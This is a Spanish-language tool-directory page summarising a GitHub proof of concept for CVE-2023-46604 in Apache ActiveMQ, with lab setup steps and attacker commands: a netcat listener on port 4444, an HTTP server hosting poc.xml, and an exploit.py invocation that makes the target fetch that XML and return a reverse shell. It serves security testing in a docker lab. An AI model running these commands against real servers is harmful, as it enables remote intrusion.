Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-46604 — Exploit PoC para CVE-2023-46604 dirigido a Apache ActiveMQ, que entrega una carga útil XML a través de HTTP para establecer una shell inversa en el servicio vulnerable. | Kitploit
Herramientas/GitHubGitHub/ccievoice2009/cve-2023-46604
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubccievoice2009/cve-2023-46604

CVE-2023-46604

Exploit PoC para CVE-2023-46604 dirigido a Apache ActiveMQ, que entrega una carga útil XML a través de HTTP para establecer una shell inversa en el servicio vulnerable.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-46604

image

Construir docker-compose que contenga 2 imágenes: la máquina víctima y la máquina objetivo según el entorno requerido. En la máquina víctima, iniciar ActiveMQ.

Cambiar a la máquina atacante: • Iniciar un servicio HTTP para enviar el PoC: python3 -m http.server

• Usar netcat para escuchar conexiones entrantes a la máquina atacante: nc -nlvp 4444

• Enviar el payload para crear una conexión reverse shell hacia la máquina atacante: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Donde:

  • exploit.py: archivo de código para explotar la vulnerabilidad.
  • -i 172.18.0.3: dirección IP de la máquina que envía el payload.
  • -p 61616: puerto en el que ActiveMQ de la máquina víctima está escuchando.
  • --xml http://172.18.0.2:8000/poc.xml: URL del archivo poc.xml en la máquina atacante.

Se puede observar que, después de ejecutar el comando para ejecutar el archivo 'exploit.py', el código de explotación envía un paquete 'poc.xml' desde el servidor web hacia el objetivo, que es la dirección del servicio ActiveMQ que se está ejecutando en el servidor objetivo. Al mismo tiempo, el servidor web HTTP en la máquina atacante también recibe una solicitud enviada desde la dirección IP de la máquina objetivo.

Después de enviar el payload, cambie al terminal que está escuchando en el puerto 4444 de la máquina atacante. Veremos que la reverse shell de la máquina víctima ha sido enviada de vuelta.

Descargar herramienta